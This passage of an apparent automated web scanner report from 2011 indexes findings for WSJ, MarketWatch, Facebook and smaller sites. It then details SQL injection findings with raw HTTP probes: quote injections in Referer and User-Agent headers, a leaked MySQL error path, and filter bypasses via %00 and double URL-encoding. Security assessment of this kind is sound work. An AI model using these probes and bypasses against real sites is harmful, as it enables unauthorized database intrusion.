23.26. http://rea.wsj.net/javascripts/controls.js

23.27. http://rea.wsj.net/javascripts/dj-j_global_slim.js

23.28. http://rea.wsj.net/javascripts/dragdrop.js

23.29. http://s.wsj.net/djscript/j_global.js

23.30. https://services.wsj.com/Gryphon/alternateLogin2.dj

23.31. https://services.wsj.com/Gryphon/jsp/find_acct.jsp

23.32. http://sj.smartmoney.net/smscript/bucket/NA/page/0_0_SA_0001/provided/j_global/version/20110513141138.js

23.33. http://sj.smartmoney.net/smscript/bucket/NA/page/0_0_SH_0001/provided/j_global/version/20110512235911.js

23.34. http://sj.wsj.net/djscript/bucket/NA_WSJ/page/0_0_WA_0001/provided/j_global_slim/version/20110513080738.js

23.35. http://sj.wsj.net/djscript/bucket/NA_WSJ/page/0_0_WA_0002/provided/j_global_slim/version/20110506141003.js

23.36. http://sj.wsj.net/djscript/require/j_global_slim/version/20110512230933.js

23.37. http://sj.wsj.net/djscript/require/j_global_slim/version/20110513185311.js

23.38. http://smartmoney.onespot.com/ism/nextclick_wsjdn/index.js

23.39. http://topics.wsj.com/djscript/latest/dj/widget/panels/view/SlidePanel.js

23.40. http://topics.wsj.com/subject/W/wall-street-journal/nbc-news-polls/6052

23.41. http://w.sharethis.com/button/buttons.js

23.42. http://www.dinse.com/about_the_firm/Employment.html

23.43. http://www.dinse.com/attorneys/knapp.html

23.44. http://www.dinse.com/attorneys/mckearin.html

23.45. http://www.dinse.com/attorneys/monahan.html

23.46. http://www.dinse.com/contact/email.html

23.47. http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13

23.48. http://www.marketwatch.com/story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390

23.49. http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12

23.50. http://www.mcafeesecure.com/us/products/buy_now.jsp

23.51. https://www.mcafeesecure.com/SignUp.sa

23.52. https://www.mcafeesecure.com/us/products/buy_now.jsp

23.53. http://www.siteadvisor.com/script/widget.js

24. Private IP addresses disclosed

24.1. http://connect.facebook.net/en_US/all.js

24.2. http://static.ak.connect.facebook.com/connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css

24.3. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

24.4. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

24.5. http://static.ak.fbcdn.net/connect/xd_proxy.php

24.6. http://static.ak.fbcdn.net/connect/xd_proxy.php

24.7. http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/-bv7QJTbOXU.css

24.8. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/JpK09bsayNa.js

24.9. http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/RJF4f9OXUL1.css

24.10. http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/nMKlWCMk1wz.js

24.11. http://static.ak.fbcdn.net/rsrc.php/v1/zD/r/B4K_BWwP7P5.png

24.12. http://static.ak.fbcdn.net/rsrc.php/v1/zL/r/FGFbc80dUKj.png

24.13. http://static.ak.fbcdn.net/rsrc.php/v1/ze/r/nZW4C56WJb6.png

24.14. http://www.facebook.com/extern/login_status.php

24.15. http://www.facebook.com/extern/login_status.php

24.16. http://www.facebook.com/extern/login_status.php

24.17. http://www.facebook.com/extern/login_status.php

24.18. http://www.facebook.com/extern/login_status.php

24.19. http://www.facebook.com/extern/login_status.php

24.20. http://www.facebook.com/extern/login_status.php

24.21. http://www.facebook.com/extern/login_status.php

24.22. http://www.facebook.com/extern/login_status.php

24.23. http://www.facebook.com/extern/login_status.php

24.24. http://www.facebook.com/extern/login_status.php

24.25. http://www.facebook.com/extern/login_status.php

24.26. http://www.facebook.com/extern/login_status.php

24.27. http://www.facebook.com/extern/login_status.php

24.28. http://www.facebook.com/extern/login_status.php

24.29. http://www.facebook.com/extern/login_status.php

24.30. http://www.facebook.com/extern/login_status.php

24.31. http://www.facebook.com/extern/login_status.php

24.32. http://www.facebook.com/extern/login_status.php

24.33. http://www.facebook.com/extern/login_status.php

24.34. http://www.facebook.com/extern/login_status.php

24.35. http://www.facebook.com/extern/login_status.php

24.36. http://www.facebook.com/extern/login_status.php

24.37. http://www.facebook.com/extern/login_status.php

24.38. http://www.facebook.com/plugins/fan.php

24.39. http://www.facebook.com/plugins/fan.php

24.40. http://www.facebook.com/plugins/fan.php

24.41. http://www.facebook.com/plugins/fan.php

24.42. http://www.facebook.com/plugins/fan.php

24.43. http://www.facebook.com/plugins/like.php

24.44. http://www.facebook.com/plugins/like.php

24.45. http://www.facebook.com/plugins/like.php

24.46. http://www.facebook.com/plugins/like.php

24.47. http://www.facebook.com/plugins/like.php

24.48. http://www.facebook.com/plugins/like.php

24.49. http://www.facebook.com/plugins/like.php

24.50. http://www.facebook.com/plugins/like.php

24.51. http://www.facebook.com/plugins/like.php

24.52. http://www.facebook.com/plugins/like.php

24.53. http://www.facebook.com/plugins/like.php

24.54. http://www.facebook.com/plugins/like.php

24.55. http://www.facebook.com/plugins/like.php

24.56. http://www.facebook.com/plugins/like.php

24.57. http://www.facebook.com/plugins/like.php

24.58. http://www.facebook.com/plugins/like.php

24.59. http://www.facebook.com/plugins/like.php

24.60. http://www.facebook.com/plugins/like.php

24.61. http://www.facebook.com/plugins/like.php

24.62. http://www.facebook.com/plugins/like.php

24.63. http://www.facebook.com/plugins/like.php

24.64. http://www.facebook.com/plugins/like.php

24.65. http://www.facebook.com/plugins/like.php

24.66. http://www.facebook.com/plugins/like.php

24.67. http://www.facebook.com/plugins/like.php

24.68. http://www.facebook.com/plugins/like.php

24.69. http://www.facebook.com/plugins/like.php

24.70. http://www.facebook.com/plugins/like.php

24.71. http://www.facebook.com/plugins/like.php

24.72. http://www.facebook.com/plugins/like.php

24.73. http://www.facebook.com/plugins/like.php

24.74. http://www.facebook.com/plugins/like.php

24.75. http://www.facebook.com/plugins/likebox.php

24.76. http://www.facebook.com/plugins/likebox.php

24.77. http://www.facebook.com/plugins/recommendations.php

24.78. http://www.facebook.com/widgets/recommendations.php

24.79. http://www.gomeznetworks.com/css/GomezTheme.css

24.80. http://www.gomeznetworks.com/css/GomezTheme.css

24.81. http://www.gomeznetworks.com/images/theme/compuware_gomez_logo.png

24.82. http://www.gomeznetworks.com/images/theme/compuware_gomez_logo.png

24.83. http://www.gomeznetworks.com/images/theme/platform_theme.png

24.84. http://www.gomeznetworks.com/images/theme/platform_theme.png

24.85. http://www.gomeznetworks.com/tempstyle.css

24.86. http://www.google.com/sdch/vD843DpA.dct

24.87. http://www.marketwatch.com/bg/api/Connect.ashx

24.88. http://www.marketwatch.com/bg/api/Connect.ashx

24.89. http://www.marketwatch.com/bg/api/Connect.ashx

24.90. http://www.marketwatch.com/bg/api/Connect.ashx

24.91. http://www.marketwatch.com/bg/api/Connect.ashx

24.92. http://www.marketwatch.com/bg/api/Connect.ashx

24.93. http://www.marketwatch.com/bg/api/Connect.ashx

24.94. http://www.marketwatch.com/bg/api/Connect.ashx

24.95. http://www.marketwatch.com/bg/api/Connect.ashx

24.96. http://www.marketwatch.com/bg/api/Connect.ashx

25. Robots.txt file

25.1. http://ad.doubleclick.net/adi/interactive.wsj.com/weekend

25.2. http://allthingsd.com/

25.3. http://altfarm.mediaplex.com/ad/js/13754-86576-1281-0

25.4. http://amch.questionmarket.com/adscgen/st.php

25.5. http://api.bizographics.com/v1/profile.json

25.6. http://api.twitter.com/receiver.html

25.7. http://b.scorecardresearch.com/r

25.8. http://bs.serving-sys.com/BurstingPipe/adServer.bs

25.9. http://c.statcounter.com/t.php

25.10. http://cache-01.cleanprint.net/cp/ccg

25.11. http://cheetah.vizu.com/c.gif

25.12. http://commerce.wsj.com/auth/login

25.13. https://commerce.wsj.com/auth/forgotpass

25.14. http://coretomic.com/

25.15. http://dowjones.tt.omtrdc.net/m2/dowjones/mbox/standard

25.16. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_3_0/StdBanner.js

25.17. http://fls.doubleclick.net/activityi

25.18. http://gg.google.com/csi

25.19. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1033560366/

25.20. http://i1.marketwatch.com/MW5/content/business/css/marketwatch.member.css

25.21. http://i3.marketwatch.com/MW5/content/story/css/story-typography.css

25.22. http://i4.marketwatch.com/MW5/content/story/css/story-layout.css

25.23. http://idolpeeps.com/

25.24. http://images.apple.com/global/nav/scripts/globalnav.js

25.25. http://images.scanalert.com/images/liveperson/set03/repoffline.gif

25.26. http://img.mediaplex.com/content/0/13754/86576/FINS_phone_300x250.js

25.27. http://itunes.apple.com/us/app/wsj-house-of-the-day/id418203198

25.28. http://json6.ringrevenue.com/6/map_number

25.29. http://jtools.smartmoney.com/marketspectrum/spectrumServer

25.30. http://kara.allthingsd.com/20110513/dear-yahoo-board-your-investors-are-on-line-2-and-theyre-not-happy/

25.31. http://maps.google.com/maps/api/js

25.32. http://maps.googleapis.com/maps/api/js/StaticMapService.GetMapImage

25.33. http://metrics.apple.com/b/ss/applesuperglobal/1/H.20.3/s79162857956252

25.34. http://mp.apmebf.com/ad/js/13754-86576-1281-0

25.35. http://mt0.googleapis.com/vt

25.36. http://mt1.googleapis.com/vt

25.37. http://odb.outbrain.com/utils/ping.html

25.38. http://om.dowjoneson.com/b/ss/djglobal,djwsj/1/H.20.3/s77142258654348

25.39. http://online.barrons.com/home

25.40. http://online.wsj.com/

25.41. http://p.opt.fimserve.com/bht/

25.42. http://pixel.quantserve.com/pixel

25.43. http://pubads.g.doubleclick.net/gampad/ads

25.44. http://puma.vizu.com/cdn/00/00/18/39/smart_tag.js

25.45. http://r.mzstatic.com/htmlResources/5176/web-storefront-base.cssz

25.46. http://rea.wsj.net/javascripts/dragdrop.js

25.47. http://realestate.wsj.com/for-sale/us/10010

25.48. http://s.fins.com/CombineScriptHandler.ashx

25.49. http://s.marketwatch.com/public/resources/documents/PixelTracking.html

25.50. http://safebrowsing.clients.google.com/safebrowsing/downloads

25.51. http://search.twitter.com/search.json

25.52. http://static.2mdn.net/default.htm

25.53. http://static.ak.fbcdn.net/connect/xd_proxy.php

25.54. http://toolbarqueries.clients.google.com/tbproxy/af/query

25.55. http://topics.barrons.com/person/S/michael-santoli/6041

25.56. http://topics.wsj.com/subject/W/wall-street-journal/nbc-news-polls/6052

25.57. http://traffic.outbrain.com/network/redir

25.58. http://twitter.com/WSJHouse

25.59. http://urlquery.net/

25.60. http://www.bizographics.com/collect/

25.61. http://www.dinse.com/news_events.html

25.62. http://www.facebook.com/widgets/recommendations.php

25.63. http://www.fins.com/

25.64. http://www.google-analytics.com/ga.js

25.65. http://www.googleadservices.com/pagead/conversion/1033560366/

25.66. http://www.marketwatch.com/

25.67. http://www.mcafeesecure.com/RatingVerify

25.68. https://www.mcafeesecure.com/us/products/buy_now.jsp

25.69. http://www.midphase.com/

25.70. http://www.smartmoney.com/

26. Cacheable HTTPS response

26.1. https://services.wsj.com/Gryphon/alternateLogin2.dj

26.2. https://services.wsj.com/Gryphon/images/logo.png

26.3. https://www.mcafeesecure.com/include/js/global.js

26.4. https://www.mcafeesecure.com/include/js/home_menu.js

26.5. https://www.mcafeesecure.com/include/js/menu.js

26.6. https://www.mcafeesecure.com/include/js/menutabs.js

26.7. https://www.mcafeesecure.com/include/js/tabs.js

27. Multiple content types specified

28. HTML does not specify charset

28.1. http://ad.doubleclick.net/adi/barrons.com/b2pfreezone

28.2. http://ad.doubleclick.net/adi/barrons.com/b2pfreezone_free

28.3. http://ad.doubleclick.net/adi/barrons.com/columnist

28.4. http://ad.doubleclick.net/adi/barrons.com/daily_barronstake

28.5. http://ad.doubleclick.net/adi/barrons.com/mag_streetwise

28.6. http://ad.doubleclick.net/adi/barrons.com/public_front

28.7. http://ad.doubleclick.net/adi/barrons.com/public_other

28.8. http://ad.doubleclick.net/adi/barrons.com/sponsor_pickspans

28.9. http://ad.doubleclick.net/adi/brokerbutton.smartmoney.com/partner_center

28.10. http://ad.doubleclick.net/adi/brokerbuttons.barrons.com/barrons_subfront

28.11. http://ad.doubleclick.net/adi/brokerbuttons.marketwatch.com/frontpage

28.12. http://ad.doubleclick.net/adi/brokerbuttons.marketwatch.com/markets_futuremovers

28.13. http://ad.doubleclick.net/adi/brokerbuttons.marketwatch.com/mutualfunds_jaffe

28.14. http://ad.doubleclick.net/adi/brokerbuttons.marketwatch.com/personalfinance_story

28.15. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/rej_front

28.16. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber

28.17. http://ad.doubleclick.net/adi/interactive.wsj.com/asia_houseoftheday

28.18. http://ad.doubleclick.net/adi/interactive.wsj.com/business_econ_front

28.19. http://ad.doubleclick.net/adi/interactive.wsj.com/default

28.20. http://ad.doubleclick.net/adi/interactive.wsj.com/forgotpassword

28.21. http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub

28.22. http://ad.doubleclick.net/adi/interactive.wsj.com/houseoftheday

28.23. http://ad.doubleclick.net/adi/interactive.wsj.com/news_front

28.24. http://ad.doubleclick.net/adi/interactive.wsj.com/news_taxreportstory

28.25. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel

28.26. http://ad.doubleclick.net/adi/interactive.wsj.com/pf_weekendinvestor

28.27. http://ad.doubleclick.net/adi/interactive.wsj.com/rej_front

28.28. http://ad.doubleclick.net/adi/interactive.wsj.com/rej_front_tilebot

28.29. http://ad.doubleclick.net/adi/interactive.wsj.com/rej_front_tiletop

28.30. http://ad.doubleclick.net/adi/interactive.wsj.com/topics

28.31. http://ad.doubleclick.net/adi/interactive.wsj.com/us_houseoftheday

28.32. http://ad.doubleclick.net/adi/interactive.wsj.com/weekend

28.33. http://ad.doubleclick.net/adi/marketwatch.com/brand_channel

28.34. http://ad.doubleclick.net/adi/marketwatch.com/frontpage

28.35. http://ad.doubleclick.net/adi/marketwatch.com/mutualfunds_jaffe

28.36. http://ad.doubleclick.net/adi/smartmoney.com/Homepage_Main_Front

28.37. http://ad.doubleclick.net/adi/smartmoney.com/SmartMoney_Main_Front

28.38. http://ad.doubleclick.net/adi/smartmoney.com/tool_module

28.39. http://allthingsd.com/display_cookie_notice/

28.40. http://amch.questionmarket.com/adscgen/st.php

28.41. http://bs.serving-sys.com/BurstingPipe/adServer.bs

28.42. http://fanpeeps.com/

28.43. http://fanpeeps.com/PURPBG1.png

28.44. http://fanpeeps.com/SCALE20.gif

28.45. http://fanpeeps.com/bg2.jpg

28.46. http://fanpeeps.com/function.fopen

28.47. http://fanpeeps.com/greybox/AJS.js

28.48. http://fanpeeps.com/greybox/gb_scripts.js

28.49. http://fanpeeps.com/greybox/gb_styles.css

28.50. http://fanpeeps.com/media/

28.51. http://fanpeeps.com/media/blueactive2.gif

28.52. http://fanpeeps.com/mlb

28.53. http://fanpeeps.com/nba

28.54. http://fanpeeps.com/ncaa

28.55. http://fanpeeps.com/ncaa2.php

28.56. http://fanpeeps.com/nfl

28.57. http://fanpeeps.com/thumbnailviewer.css

28.58. http://fanpeeps.com/thumbnailviewer.js

28.59. http://fanpeeps.com/twitterlib.js

28.60. http://fanpeeps.com/worldcup

28.61. http://fls.doubleclick.net/activityi

28.62. http://mediacdn.disqus.com/1305332303/build/system/def.html

28.63. http://mediacdn.disqus.com/1305332303/build/system/reply.html

28.64. http://mediacdn.disqus.com/1305332303/build/system/upload.html

28.65. http://odb.outbrain.com/utils/ping.html

28.66. http://online.barrons.com//static_html_files/addineyeV2.html

28.67. http://online.wsj.com/doubleclick/DARTIframe.html

28.68. http://online.wsj.com/internal/ModTwitWSJPersonalFin.htm

28.69. http://online.wsj.com/internal/ModTwitWSJRealEstate.htm

28.70. http://online.wsj.com/static_html_files/MSNSponsoredLinks.html

28.71. http://online.wsj.com/static_html_files/WSJThirdParty_Footer_Nav.html

28.72. http://online.wsj.com/static_html_files/WSJThirdParty_Header_Nav_Commerce.html

28.73. https://order.wsj.com/favicon.ico

28.74. http://ping.chartbeat.net/ping

28.75. http://promos.mcafee.com/favicon.ico

28.76. http://server.iad.liveperson.net/hcp/integration/hackersafe/hackersafe-grey.html

28.77. http://static.2mdn.net/default.htm

28.78. http://topics.wsj.com/api-video/get_video_info.asp

28.79. http://use.typekit.com/k/uhh2the-e.css

28.80. http://www.cerebel.com/

28.81. http://www.cerebel.com/contact.php

28.82. http://www.cerebel.com/greenlinks.ico

28.83. http://www.cerebel.com/greybox/loader_frame.html

28.84. http://www.fanpeeps.com/

28.85. http://www.fanpeeps.com/bg2.jpg

28.86. http://www.fanpeeps.com/media/blueactive2.gif

28.87. http://www.marketwatch.com/cdn_content/business/re.html

28.88. http://www.marketwatch.com/doubleclick/DARTIframe.html

29. Content type incorrectly stated

29.1. http://0d7292.r.axf8.net/mr/a.gif

29.2. http://72d329.r.axf8.net/mr/a.gif

29.3. http://a1.twimg.com/profile_images/409944203/blueaspiicon_normal.gif

29.4. http://a2.twimg.com/profile_images/362264839/Pilon-Mary-colhed_normal.gif

29.5. http://allthingsd.com/

29.6. http://amch.questionmarket.com/adscgen/st.php

29.7. http://api.twitter.com/1/urls/resolve.json

29.8. http://b.scorecardresearch.com/favicon.ico

29.9. http://barrons.wsj.net/public/resources/documents/ac_keyword_exception_list.js

29.10. http://bs.serving-sys.com/BurstingPipe/adServer.bs

29.11. http://catrg.peer39.net/145/200/206100145

29.12. http://catrg.peer39.net/239/415/1360207739

29.13. http://catrg.peer39.net/306/63/1141031806

29.14. http://catrg.peer39.net/313/386/376693313

29.15. http://catrg.peer39.net/36/210/1382605036

29.16. http://catrg.peer39.net/384/75/2076037884

29.17. http://catrg.peer39.net/83/435/1736717583

29.18. http://coretomic.com/CN/script/Validate.js

29.19. http://cs.wsj.net/community/content/images/misc/groups/otherquestionmark.25x25.png

29.20. http://cs.wsj.net/community/content/images/misc/groups/otherquestionmark.80x80.png

29.21. http://cs.wsj.net/community/content/images/misc/groups/persfinancepiggybank.80x80.png

29.22. http://cs.wsj.net/community/content/images/misc/members/defaultuser.50x50.png

29.23. http://fanpeeps.com/horizontalbuttons1.css

29.24. http://fanpeeps.com/horizontaltabs1.css

29.25. http://i4.marketwatch.com/MW5/content/Story/Images/icon-thumb.gif

29.26. http://images.apple.com/global/nav/scripts/globalnav.js

29.27. http://images.scanalert.com/images/favicon.mcafeesecure.ico

29.28. http://json6.ringrevenue.com/images/generic/logo.png

29.29. http://kara.allthingsd.com/

29.30. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

29.31. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo

29.32. http://online.barrons.com/mdc/public/js/9_3001_Refresh_HP.js

29.33. http://online.barrons.com/scorecard/SC_BEAR_O_2011_L.json

29.34. http://online.barrons.com/scorecard/SC_BEAR_P_2011_L.json

29.35. http://online.barrons.com/scorecard/SC_BULL_O_2011_L.json

29.36. http://online.barrons.com/scorecard/SC_BULL_P_2011_L.json

29.37. http://online.wsj.com/djscript/latest/dojo/cldr/nls/en/number.js

29.38. http://online.wsj.com/public/page/0_0_WC_HeaderWeather-10005.html

29.39. https://order.wsj.com/sub/f3/offer_form

29.40. http://rt.disqus.com/forums/realtime-cached.js

29.41. http://s.wsj.net/img/sm/textResizeIcons.gif

29.42. http://s.wsj.net/public/resources/documents/ac_keyword_exception_list.js

29.43. http://s1.wsj.net/img/nav_bg_wknd.gif

29.44. http://s3.wsj.net/img/bg-liveMarketUpdates.jpg

29.45. http://s4.wsj.net/img/icon_facebook_m.gif

29.46. http://server.iad.liveperson.net/hcp/html/mTag.js

29.47. https://services.wsj.com/Gryphon/images/logo.png

29.48. http://topics.wsj.com/api-video/get_video_info.asp

29.49. http://twitter.com/account/available_features

29.50. http://www.dinse.com/include/standart_lib.js

29.51. http://www.facebook.com/extern/login_status.php

29.52. http://www.fanpeeps.com/horizontalbuttons1.css

29.53. http://www.fanpeeps.com/horizontaltabs1.css

29.54. http://www.google.com/realtimejs

29.55. http://www.idolpeeps.com/images/peep3/subjects/1th.jpg

29.56. http://www.idolpeeps.com/images/peep3/subjects/2th.jpg

29.57. http://www.idolpeeps.com/images/peep3/subjects/3th.jpg

29.58. http://www.idolpeeps.com/images/peep3/subjects/4th.jpg

29.59. http://www.idolpeeps.com/images/peep3/subjects/5th.jpg

29.60. http://www.idolpeeps.com/images/peep3/subjects/6th.jpg

29.61. http://www.marketwatch.com/bg/api/Pickup.ashx

29.62. http://www.mcafeesecure.com/include/js/global.js

29.63. http://www.mcafeesecure.com/include/js/home_menu.js

29.64. http://www.mcafeesecure.com/include/js/menu.js

29.65. http://www.mcafeesecure.com/include/js/menutabs.js

29.66. http://www.mcafeesecure.com/include/js/slideshow.js

29.67. http://www.mcafeesecure.com/include/js/tabs.js

29.68. https://www.mcafeesecure.com/include/js/global.js

29.69. https://www.mcafeesecure.com/include/js/home_menu.js

29.70. https://www.mcafeesecure.com/include/js/menu.js

29.71. https://www.mcafeesecure.com/include/js/menutabs.js

29.72. https://www.mcafeesecure.com/include/js/tabs.js

29.73. http://www.siteadvisor.com/images/logo.gif

29.74. http://www.smartmoney.com/remote/commentHandler/do/commentcount/

30. Content type is not specified

30.1. http://dowjones.tt.omtrdc.net/m2/dowjones/mbox/standard

30.2. http://lq.smartmoney.net/q

30.3. http://server.iad.liveperson.net/hc/10599399/

30.4. http://traffic.outbrain.com/network/redir



1. SQL injection
There are 92 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ad.doubleclick.net/adj/bottom.interactive.wsj.com/business_econ_front [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/bottom.interactive.wsj.com/business_econ_front

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /adj/bottom.interactive.wsj.com/business_econ_front;!category=;biz=1053;;;mc=b2pfreezone;tile=7;sz=336x280,300x250;ord=5370537053705370; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%00'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 14 May 2011 10:14:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 3429

document.write('\n<!-- Copyright DoubleClick Inc., All rights reserved. -->\n<!-- This code was autogenerated @ Wed Nov 10 02:53:44 EST 2010 -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
ript>');document.write('\n \n');


var dcallowscriptaccess = 'never';
var plugin = false;
var advurl = 'http://www.unigo.com/wsj/';
var alttext = '';
var dcgif = 'http://s0.2mdn.net/1146650/JIE_UnigoFail_300x250.jpg';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://www.unigo.com/wsj/';
var target = '_blank';
var dcbgcolor = '';
var dcswf = 'http://s0.2mdn.net/1146650/JIE_Unig
...[SNIP]...

Request 2

GET /adj/bottom.interactive.wsj.com/business_econ_front;!category=;biz=1053;;;mc=b2pfreezone;tile=7;sz=336x280,300x250;ord=5370537053705370; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%00''
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 14 May 2011 10:14:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 3521

document.write('\n<!-- Copyright DoubleClick Inc., All rights reserved. -->\n<!-- This code was autogenerated @ Tue Jan 05 23:47:09 EST 2010 -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...

1.2. http://fanpeeps.com/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /? HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:46:19 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 18095

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /? HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:46:19 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 45737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.3. http://fanpeeps.com/ [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /?action=page&pid=&page=contact HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
